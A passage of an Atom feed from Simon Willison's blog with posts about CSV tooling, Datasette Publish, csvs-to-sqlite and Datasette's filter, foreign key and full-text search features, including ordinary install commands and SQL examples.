    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="projects"/><category term="sqlite"/></entry><entry><title>Parsing CSV using ANTLR and Python 3</title><link href="https://simonwillison.net/2018/Apr/6/python3-antlr-csv/#atom-tag" rel="alternate"/><published>2018-04-06T14:33:58+00:00</published><updated>2018-04-06T14:33:58+00:00</updated><id>https://simonwillison.net/2018/Apr/6/python3-antlr-csv/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/jszheng/py3antlr4book/tree/master/08-CSV"&gt;Parsing CSV using ANTLR and Python 3&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I’ve been trying to figure out how to use ANTLR grammars from Python—this is the first example I’ve found that really clicked for me.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/antlr"&gt;antlr&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/parsing"&gt;parsing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;&lt;/p&gt;



</summary><category term="antlr"/><category term="csv"/><category term="parsing"/><category term="python"/></entry><entry><title>django-postgres-copy</title><link href="https://simonwillison.net/2018/Jan/26/django-postgres-copy/#atom-tag" rel="alternate"/><published>2018-01-26T00:43:04+00:00</published><updated>2018-01-26T00:43:04+00:00</updated><id>https://simonwillison.net/2018/Jan/26/django-postgres-copy/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://django-postgres-copy.californiacivicdata.org/en/latest/"&gt;django-postgres-copy&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Really neat Django queryset add-on which exposes the PostgreSQL COPY statement for importing (and exporting) CSV data. MyModel.objects.from_csv(“filename.csv”). Built by the team of data journalists at the California Civic Data Coalition.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://www.californiacivicdata.org/2018/01/25/index-drop-and-copy/"&gt;Cut down database imports by a third using this one weird trick&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django"&gt;django&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="django"/><category term="postgresql"/></entry><entry><title>Datasette Publish: a web app for publishing CSV files as an online database</title><link href="https://simonwillison.net/2018/Jan/17/datasette-publish/#atom-tag" rel="alternate"/><published>2018-01-17T14:11:05+00:00</published><updated>2018-01-17T14:11:05+00:00</updated><id>https://simonwillison.net/2018/Jan/17/datasette-publish/#atom-tag</id><summary type="html">
    &lt;p&gt;I’ve just released &lt;a href="https://publish.datasettes.com/"&gt;Datasette Publish&lt;/a&gt;, a web tool for turning one or more CSV files into an online database with a JSON API.&lt;/p&gt;
&lt;p&gt;Here’s &lt;a href="https://datasette-onrlszntsq.now.sh/"&gt;a demo application I built&lt;/a&gt; using Datasette Publish, showing Californian campaign finance data using CSV files released by the &lt;a href="https://www.californiacivicdata.org/"&gt;California Civic Data Coalition&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;And here’s an animated screencast showing exactly how I built it:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2018/datasette-publish-demo.gif" alt="Animated demo of Datasette Publish" style="max-width: 100%" /&gt;&lt;/p&gt;
&lt;p&gt;Datasette Publish combines my &lt;a href="https://github.com/simonw/datasette"&gt;Datasette&lt;/a&gt; tool for publishing SQLite databases as an API with my &lt;a href="https://github.com/simonw/csvs-to-sqlite"&gt;csvs-to-sqlite&lt;/a&gt; tool for generating them.&lt;/p&gt;
&lt;p&gt;It’s built on top of the &lt;a href="https://zeit.co/now"&gt;Zeit Now&lt;/a&gt; hosting service, which means anything you deploy with it lives on your own account with Zeit and stays entirely under your control. I used the brand new &lt;a href="https://zeit.co/blog/api-2"&gt;Zeit API 2.0&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Zeit’s generous free plan means you can try the tool out as many times as you like - and if you want to use it for an API powering a production website you can easily upgrade to a &lt;a href="https://zeit.co/pricing"&gt;paid hosting plan&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;a id="Who_should_use_it_16"&gt;&lt;/a&gt;Who should use it&lt;/h2&gt;
&lt;p&gt;Anyone who has data they want to share with the world!&lt;/p&gt;
&lt;p&gt;The fundamental idea behind Datasette is that publishing structured data as both a web interface and a JSON API should be as quick and easy as possible.&lt;/p&gt;
&lt;p&gt;The world is full of interesting data that often ends up trapped in PDF blobs or other hard-to-use formats, if it gets published at all. Datasette encourages using SQLite instead: a powerful, flexible format that enables analysis via SQL queries and can easily be shared and hosted online.&lt;/p&gt;
&lt;p&gt;Since so much of the data that IS published today uses CSV, this first release of Datasette Publish focuses on CSV conversion above anything else. I plan to add support for other useful formats in the future.&lt;/p&gt;
&lt;p&gt;The three areas I’m most excited in seeing adoption of Datasette are data journalism, civic open data and cultural institutions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data journalism&lt;/strong&gt; because when I worked at the Guardian Datasette is the tool I wish I had had for publishing data. When we started &lt;a href="https://www.theguardian.com/data"&gt;the Guardian Datablog&lt;/a&gt; we ended up using Google Sheets for this.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Civic open data&lt;/strong&gt; because it turns out the open data movement mostly won! It’s incredible how much high quality data is published by local and national governments these days. My &lt;a href="https://sf-tree-search.now.sh"&gt;San Francisco tree search&lt;/a&gt; project for example uses data from the Department of Public Works - a &lt;a href="https://data.sfgov.org/City-Infrastructure/Street-Tree-List/tkzw-k3nq"&gt;CSV of 190,000 trees&lt;/a&gt; around the city.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cultural institutions&lt;/strong&gt; because the museums and libraries of the world are sitting on enormous treasure troves of valuable information, and have an institutional mandate to share that data as widely as possible.&lt;/p&gt;
&lt;p&gt;If you are involved in any of the above please &lt;a href="https://twitter.com/simonw"&gt;get in touch&lt;/a&gt;. I’d love your help improving the Datasette ecosystem to better serve your needs.&lt;/p&gt;
&lt;h2&gt;&lt;a id="How_it_works_36"&gt;&lt;/a&gt;How it works&lt;/h2&gt;
&lt;p&gt;Datasette Publish would not be possible without Zeit Now. Now is a revolutionary approach to hosting: it lets you instantly create immutable deployments with a unique URL, via a command-line tool or using &lt;a href="https://zeit.co/api"&gt;their recently updated API&lt;/a&gt;. It’s by far the most productive hosting environment I’ve ever worked with.&lt;/p&gt;
&lt;p&gt;I built the main Datasette Publish interface using React. Building a SPA here made a lot of sense, because it allowed me to construct the entire application without any form of server-side storage (aside from &lt;a href="https://keen.io/"&gt;Keen&lt;/a&gt; for analytics).&lt;/p&gt;
&lt;p&gt;When you sign in via Zeit OAuth I store your access token in a signed cookie. Each time you upload a CSV the file is stored directly using Zeit’s upload API, and the file metadata is persisted in JavaScript state in the React app. When you click “publish” the accumulated state is sent to the server where it is used to construct a new Zeit deployment.&lt;/p&gt;
&lt;p&gt;The deployment itself consists of the CSV files plus &lt;a href="https://gist.github.com/simonw/365294fb51765fb07bc99fe5eb7fee22"&gt;a Dockerfile&lt;/a&gt; that installs Python, Datasette, csvs-to-sqlite and their dependencies, then runs csvs-to-sqlite against the CSV files and starts up Datasette against the resulting database.&lt;/p&gt;
&lt;p&gt;If you specified a title, description, source or license I generate a Datasette &lt;a href="https://datasette.readthedocs.io/en/latest/metadata.html"&gt;metadata.json&lt;/a&gt; file and include that in the deployment as well.&lt;/p&gt;
&lt;p&gt;Since free deployments to Zeit are “source code visible”, you can see exactly how the resulting application is structured by visiting &lt;a href="https://datasette-onrlszntsq.now.sh/_src"&gt;https://datasette-onrlszntsq.now.sh/_src&lt;/a&gt; (the campaign finance app I built earlier).&lt;/p&gt;
&lt;p&gt;Using the Zeit API in this way has the neat effect that I don’t ever store any user data myself - neither the access token used to access your account nor any of the CSVs that you upload. Uploaded files go straight to your own Zeit account and stay under your control. Access tokens are never persisted. The deployed application lives on your own hosting account, where you can terminate it or upgrade it to a paid plan without any further involvement from the tool I have built.&lt;/p&gt;
&lt;p&gt;Not having to worry about storing encrypted access tokens or covering any hosting costs beyond the Datasette Publish tool itself is delightful.&lt;/p&gt;
&lt;p&gt;This ability to build tools that themselves deploy other tools is fascinating. I can’t wait to see what other kinds of interesting new applications it enables.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://news.ycombinator.com/item?id=16170892"&gt;Discussion on Hacker News&lt;/a&gt;.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/zeit-now"&gt;zeit-now&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="projects"/><category term="zeit-now"/><category term="datasette"/></entry><entry><title>csvkit</title><link href="https://simonwillison.net/2018/Jan/8/csvkit/#atom-tag" rel="alternate"/><published>2018-01-08T21:03:38+00:00</published><updated>2018-01-08T21:03:38+00:00</updated><id>https://simonwillison.net/2018/Jan/8/csvkit/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://csvkit.readthedocs.io/"&gt;csvkit&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
“A suite of command-line tools for converting to and working with CSV”—includes a huge range of utilities for things like converting Excel and JSON to CSV, grepping, sorting and extracting a subset of columns, combining multiple CSV files together and exporting CSV to a relational database. Worth reading through the tutorial which shows how the different commands can be piped together.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="datasette"/></entry><entry><title>Himalayan Database: From Visual FoxPro GUI to JSON API with Datasette</title><link href="https://simonwillison.net/2018/Jan/8/himalayan-database-visual-foxpro-gui-json-api-datasette/#atom-tag" rel="alternate"/><published>2018-01-08T19:26:49+00:00</published><updated>2018-01-08T19:26:49+00:00</updated><id>https://simonwillison.net/2018/Jan/8/himalayan-database-visual-foxpro-gui-json-api-datasette/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://gist.github.com/atomotic/61542deb5d1e77a5ff842658b75982ef"&gt;Himalayan Database: From Visual FoxPro GUI to JSON API with Datasette&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The Himalayan Database is a compilation of records for all expeditions that have climbed in the Nepalese Himalaya, originally compiled by journalist Elizabeth Hawley over several decades. The database is published as a Visual FoxPro database—here  Raffaele Messuti‏ provides step-by-step instructions for extracting the data from the published archive, converting them to CSV using dbfcsv and then converting the CSVs to SQLite using csvs-to-sqlite so you can browse them using Datasette.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/atomotic/status/949975717734883328"&gt;Raffaele Messuti‏&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="datasette"/></entry><entry><title>Big Data Workflow with Pandas and SQLite</title><link href="https://simonwillison.net/2017/Nov/28/big-data-workflow-with-pandas-and-sqlite/#atom-tag" rel="alternate"/><published>2017-11-28T23:02:50+00:00</published><updated>2017-11-28T23:02:50+00:00</updated><id>https://simonwillison.net/2017/Nov/28/big-data-workflow-with-pandas-and-sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://plot.ly/python/big-data-analytics-with-pandas-and-sqlite/"&gt;Big Data Workflow with Pandas and SQLite&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Handy tutorial on dealing with larger data (in this case a 3.9GB CSV file) by incrementally loading it into pandas and writing it out to SQLite.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/palewire/status/935642068461826049"&gt;Ben Welsh&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pandas"&gt;pandas&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="pandas"/><category term="sqlite"/></entry><entry><title>Added TSV example to the README · simonw/csvs-to-sqlite@957d4f5</title><link href="https://simonwillison.net/2017/Nov/26/tsv/#atom-tag" rel="alternate"/><published>2017-11-26T07:02:15+00:00</published><updated>2017-11-26T07:02:15+00:00</updated><id>https://simonwillison.net/2017/Nov/26/tsv/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csvs-to-sqlite/commit/957d4f58935487104ebc155da305d00f42005595"&gt;Added TSV example to the README · simonw/csvs-to-sqlite@957d4f5&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thanks to a pull request from Jani Monoses, csvs-to-sqlite can now handle TSV (or any other separator) as well as regular CSVs.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/></entry><entry><title>New in Datasette: filters, foreign keys and search</title><link href="https://simonwillison.net/2017/Nov/25/new-in-datasette/#atom-tag" rel="alternate"/><published>2017-11-25T21:17:47+00:00</published><updated>2017-11-25T21:17:47+00:00</updated><id>https://simonwillison.net/2017/Nov/25/new-in-datasette/#atom-tag</id><summary type="html">
    &lt;p&gt;I’ve released &lt;a href="https://github.com/simonw/datasette"&gt;Datasette 0.13&lt;/a&gt; with a number of exciting new features (&lt;a href="https://simonwillison.net/2017/Nov/13/datasette/"&gt;Datasette previously&lt;/a&gt;).&lt;/p&gt;
&lt;h3&gt;&lt;a id="Filters_4"&gt;&lt;/a&gt;Filters&lt;/h3&gt;
&lt;p&gt;Datasette’s table view supports query-string based filtering. 0.13 introduces a new user interface for constructing those filters. Let’s use it to &lt;a href="https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9/bob-ross%2Felements-by-episode?CLOUDS__exact=1&amp;amp;EPISODE__startswith=S03&amp;amp;MOUNTAIN__exact=1"&gt;find every episode where Bob Ross painted clouds and mountains&lt;/a&gt; in season 3 of The Joy of Painting:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9/bob-ross%2Felements-by-episode?CLOUDS__exact=1&amp;amp;EPISODE__startswith=S03&amp;amp;MOUNTAIN__exact=1"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/bob-ross.gif" alt="Animation demonstrating the new filter UI" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The resulting querystring looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;?CLOUDS__exact=1&amp;amp;EPISODE__startswith=S03&amp;amp;MOUNTAIN__exact=1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using the &lt;code&gt;.json&lt;/code&gt; or &lt;code&gt;.jsono&lt;/code&gt; extension on the same URL returns JSON (in list-of-lists or list-of-objects format), so the new filter UI also acts as a simple API explorer. If you click “View and edit SQL” you will get the generated SQL in an editor, ready for you to further modify it.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Foreign_key_relationships_16"&gt;&lt;/a&gt;Foreign key relationships&lt;/h3&gt;
&lt;p&gt;Datasette now provides special treatment for SQLite foreign key relationships: if it detects a foreign key when displaying a table it will show values in that column as links to the related records - and if the foreign key table has an obvious label column, that label will be displayed in the column as the link label.&lt;/p&gt;
&lt;p&gt;Here’s an example, using San Francisco’s &lt;a href="https://data.sfgov.org/Economy-and-Community/Mobile-Food-Facility-Permit/rqzj-sfat"&gt;Mobile Food Facility Permit&lt;/a&gt; dataset… aka food trucks!&lt;/p&gt;
&lt;p&gt;&lt;a href="https://san-francisco.datasettes.com/food-trucks/Mobile_Food_Facility_Permit?Status=5"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/food-trucks.png" alt="Food truck table, showing links in the Applicant and FacilityType columns" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And here’s a portion of the corresponding &lt;code&gt;CREATE TABLE&lt;/code&gt; statements showing the foreign key relationships:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE &amp;quot;Mobile_Food_Facility_Permit&amp;quot; (
    &amp;quot;locationid&amp;quot; INTEGER,
    &amp;quot;Applicant&amp;quot; INTEGER,
    &amp;quot;FacilityType&amp;quot; INTEGER,
    &amp;quot;cnn&amp;quot; INTEGER,
    &amp;quot;LocationDescription&amp;quot; TEXT,
    ...,
    FOREIGN KEY (&amp;quot;Applicant&amp;quot;) REFERENCES [Applicant](id),
    FOREIGN KEY (&amp;quot;FacilityType&amp;quot;) REFERENCES [FacilityType](id)
);
CREATE TABLE &amp;quot;Applicant&amp;quot; (
    &amp;quot;id&amp;quot; INTEGER PRIMARY KEY ,
    &amp;quot;value&amp;quot; TEXT
);
CREATE TABLE &amp;quot;FacilityType&amp;quot; (
    &amp;quot;id&amp;quot; INTEGER PRIMARY KEY ,
     &amp;quot;value&amp;quot; TEXT
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you click through to one of the linked records, you’ll see &lt;a href="https://san-francisco.datasettes.com/food-trucks-921342f/Applicant/28"&gt;a page like this&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://san-francisco.datasettes.com/food-trucks/Applicant/28"&gt;&lt;img style="width: 350px; max-width: 100%" src="https://static.simonwillison.net/static/2017/food-trucks-applicant.png" alt="Food truck applicant" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The “Links from other tables” section lists all other tables that reference this row, and links to a filtered query showing the corresponding records.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Using_csvstosqlite_to_build_foreign_key_tables_51"&gt;&lt;/a&gt;Using csvs-to-sqlite to build foreign key tables&lt;/h3&gt;
&lt;p&gt;The latest release of my &lt;a href="https://github.com/simonw/csvs-to-sqlite"&gt;csvs-to-sqlite utility&lt;/a&gt; adds a feature which complements Datasette’s foreign key support: you can now tell &lt;code&gt;csvs-to-sqlite&lt;/code&gt; to “extract” a specified set of columns and use them to create additional tables.&lt;/p&gt;
&lt;p&gt;Here’s how to create &lt;a href="https://san-francisco.datasettes.com/food-trucks"&gt;the food-trucks.db database&lt;/a&gt; used in the above examples.&lt;/p&gt;
&lt;p&gt;First step: make sure you have Python 3 installed. On OS X with homebrew you can run &lt;code&gt;brew install python3&lt;/code&gt;, otherwise follow the instructions on &lt;a href="https://www.python.org/"&gt;Python.org&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Ensure you have the most recent releases of csvs-to-sqlite and datasette:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pip3 install csvs-to-sqlite -U
pip3 install datasette -U
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You may need to &lt;code&gt;sudo&lt;/code&gt; these.&lt;/p&gt;
&lt;p&gt;Now export the full CSV file from the &lt;a href="https://data.sfgov.org/Economy-and-Community/Mobile-Food-Facility-Permit/rqzj-sfat"&gt;Mobile Food Facility Permit&lt;/a&gt; page.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://data.sfgov.org/Economy-and-Community/Mobile-Food-Facility-Permit/rqzj-sfat"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/data-sf-how-to-download.png" alt="How to download CSV from data.sfgov.org" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here’s a sample of that CSV file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ head -n 2 Mobile_Food_Facility_Permit.csv 
locationid,Applicant,FacilityType,cnn,LocationDescription,Address,blocklot,block,lot,permit,Status,FoodItems,X,Y,Latitude,Longitude,Schedule,dayshours,NOISent,Approved,Received,PriorPermit,ExpirationDate,Location
751253,Pipo's Grill,Truck,5688000,FOLSOM ST: 14TH ST to 15TH ST (1800 - 1899),1800 FOLSOM ST,3549083,3549,083,16MFF-0010,REQUESTED,Tacos: Burritos: Hot Dogs: and Hamburgers,6007856.719,2107724.046,37.7678524427181,-122.416104892532,http://bsm.sfdpw.org/PermitsTracker/reports/report.aspx?title=schedule&amp;amp;report=rptSchedule&amp;amp;params=permit=16MFF-0010&amp;amp;ExportPDF=1&amp;amp;Filename=16MFF-0010_schedule.pdf,,,,2016-02-04,0,,&amp;quot;(37.7678524427181, -122.416104892532)&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Next, run the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;csvs-to-sqlite Mobile_Food_Facility_Permit.csv \
    -c FacilityType \
    -c block \
    -c Status \
    -c Applicant \
    food-trucks.db
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;-c&lt;/code&gt; options are the real magic here: they tell &lt;code&gt;csvs-to-sqlite&lt;/code&gt; to take that column from the CSV file and extract it out into a lookup table.&lt;/p&gt;
&lt;p&gt;Having created the new database, you can use Datasette to browse it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;datasette food-trucks.db
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then browse to &lt;a href="http://127.0.0.1:8001/"&gt;http://127.0.0.1:8001/&lt;/a&gt; and start exploring.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Fulltext_search_with_Datasette_and_csvstosqlite_93"&gt;&lt;/a&gt;Full-text search with Datasette and csvs-to-sqlite&lt;/h3&gt;
&lt;p&gt;SQLite includes a powerful full-text search implementation in the form of the &lt;a href="https://sqlite.org/fts3.html"&gt;FTS3, FTS4&lt;/a&gt; and (in the most recent versions) &lt;a href="https://sqlite.org/fts5.html"&gt;FTS5&lt;/a&gt; modules.&lt;/p&gt;
&lt;p&gt;Datasette will look for tables that have a FTS virtual table configured against them and, if detected, will add support for a &lt;code&gt;_search=&lt;/code&gt; query string argument and a search text interface as well.&lt;/p&gt;
&lt;p&gt;Here’s &lt;a href="https://san-francisco.datasettes.com/sf-film-locations/Film_Locations_in_San_Francisco?_search=coit+tower"&gt;an example of Datasette and SQLite FTS in action&lt;/a&gt;, this time using the DataSF list of &lt;a href="https://data.sfgov.org/Culture-and-Recreation/Film-Locations-in-San-Francisco/yitu-d5am"&gt;Film Locations in San Francisco&lt;/a&gt; provided by the San Francisco Film Commission.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://san-francisco.datasettes.com/sf-film-locations/Film_Locations_in_San_Francisco?_search=coit+tower"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/sf-film-locations-coit-tower.png" alt="Searching film locations for Coit Tower" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If you click on &amp;quot;&lt;a href="https://san-francisco.datasettes.com/sf-film-locations?sql=select+rowid%2C+%2A+from+Film_Locations_in_San_Francisco+where+rowid+in+%28select+rowid+from+%5BFilm_Locations_in_San_Francisco_fts%5D+where+%5BFilm_Locations_in_San_Francisco_fts%5D+match+%3Asearch%29+order+by+rowid+limit+101&amp;amp;search=coit+tower"&gt;View and edit SQL&lt;/a&gt;&amp;quot; you’ll see how the underlying query works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select rowid, *
from Film_Locations_in_San_Francisco
where rowid in (
    select rowid
    from [Film_Locations_in_San_Francisco_fts]
    where [Film_Locations_in_San_Francisco_fts] match :search
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;csvs-to-sqlite&lt;/code&gt; knows how to create the underlying FTS virtual tables from a specified list of columns. Here’s how to create the sf-film-locations database:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;csvs-to-sqlite \
    Film_Locations_in_San_Francisco.csv sf-film-locations.db \
    -c Title \
    -c &amp;quot;Release Year&amp;quot; \
    -c &amp;quot;Production Company&amp;quot; \
    -c &amp;quot;Distributor&amp;quot; \
    -c &amp;quot;Director&amp;quot; \
    -c &amp;quot;Writer&amp;quot; \
    -c &amp;quot;Actor 1:Actors&amp;quot; \
    -c &amp;quot;Actor 2:Actors&amp;quot; \
    -c &amp;quot;Actor 3:Actors&amp;quot; \
    -f Title \
    -f &amp;quot;Production Company&amp;quot; \
    -f Director \
    -f Writer \
    -f &amp;quot;Actor 1&amp;quot; \
    -f &amp;quot;Actor 2&amp;quot; \
    -f &amp;quot;Actor 3&amp;quot; \
    -f Locations \
    -f &amp;quot;Fun Facts&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;-f&lt;/code&gt; options are used to specify the columns which should be incorporated into the SQLite full-text search index. Note that the &lt;code&gt;-f&lt;/code&gt; argument is compatible with the &lt;code&gt;-c&lt;/code&gt; argument described above - if you extract a text column into a separate table, &lt;code&gt;csvs-to-sqlite&lt;/code&gt; can still incorporate data from that column into the full-text index it creates.&lt;/p&gt;
&lt;p&gt;I’m using another new feature above as well: the CSV file has three columns for actors, &lt;code&gt;Actor 1&lt;/code&gt;, &lt;code&gt;Actor 2&lt;/code&gt; and &lt;code&gt;Actor 3&lt;/code&gt;. I can tell the &lt;code&gt;-c&lt;/code&gt; column extractor to refer each of those columns to the same underlying lookup table like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    -c &amp;quot;Actor 1:Actors&amp;quot; \
    -c &amp;quot;Actor 2:Actors&amp;quot; \
    -c &amp;quot;Actor 3:Actors&amp;quot; \
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you visit &lt;a href="https://san-francisco.datasettes.com/sf-film-locations-84594a7/Actors/3"&gt;the Eddie Murphy page&lt;/a&gt; you can see that he’s listed as Actor 1 for 14 rows and in Actor 2 for 1.&lt;/p&gt;
&lt;h3&gt;&lt;a id="A_search_engine_for_trees_146"&gt;&lt;/a&gt;A search engine for trees!&lt;/h3&gt;
&lt;p&gt;One last demo, this time using my favourite CSV file from &lt;a href="http://data.sfgov.org"&gt;data.sfgov.org&lt;/a&gt;: the &lt;a href="https://data.sfgov.org/City-Infrastructure/Street-Tree-List/tkzw-k3nq"&gt;Street Tree List&lt;/a&gt;, published by the San Francisco Department of Public Works.&lt;/p&gt;
&lt;p&gt;This time, in addition to &lt;a href="https://san-francisco.datasettes.com/sf-trees-ebc2ad9/Street_Tree_List"&gt;publishing the database&lt;/a&gt; I also put together a custom UI for querying it, based on the &lt;a href="https://leaflet.github.io/Leaflet.markercluster/"&gt;Leaflet.markercluster&lt;/a&gt; library. You can try that out at &lt;a href="https://sf-tree-search.now.sh/"&gt;https://sf-tree-search.now.sh/&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://sf-tree-search.now.sh/?q=polk%20st%20palm"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/sf-tree-search.png" alt="SF Tree Search" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here’s the command I used to create the database:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;csvs-to-sqlite Street_Tree_List.csv sf-trees.db \
    -c qLegalStatus \
    -c qSpecies \
    -c qSiteInfo \
    -c PlantType \
    -c qCaretaker \
    -c qCareAssistant \
    -f qLegalStatus \
    -f qSpecies \
    -f qAddress \
    -f qSiteInfo \
    -f PlantType \
    -f qCaretaker \
    -f qCareAssistant \
    -f PermitNotes
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Once again, I’m extracting out specified columns and pointing the SQLite full-text indexer at a subset of them.&lt;/p&gt;
&lt;p&gt;Since the JavaScript search needs to pull back a subset of the overall data, I composed &lt;a href="https://san-francisco.datasettes.com/sf-trees?sql=select+Latitude%2C%0D%0A++++Longitude%2C%0D%0A++++qSpecies.value+as+qSpecies%2C%0D%0A++++qAddress%0D%0Afrom%0D%0A++++Street_Tree_List%0D%0A++++join+qSpecies%0D%0A++++++++on+Street_Tree_List.qSpecies+%3D+qSpecies.id%0D%0Awhere%0D%0A++++Street_Tree_List.rowid+in+%28%0D%0A++++++++select%0D%0A++++++++++++rowid%0D%0A++++++++from%0D%0A++++++++++++%5BStreet_Tree_List_fts%5D%0D%0A++++++++where+%5BStreet_Tree_List_fts%5D+match+%3Asearch%0D%0A++++%29%0D%0A&amp;amp;search=olive"&gt;a custom SQL query&lt;/a&gt; to drive those searches.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://github.com/simonw/sf-tree-search"&gt;full source code&lt;/a&gt; for my tree search demo is available on GitHub.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/search"&gt;search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;
    

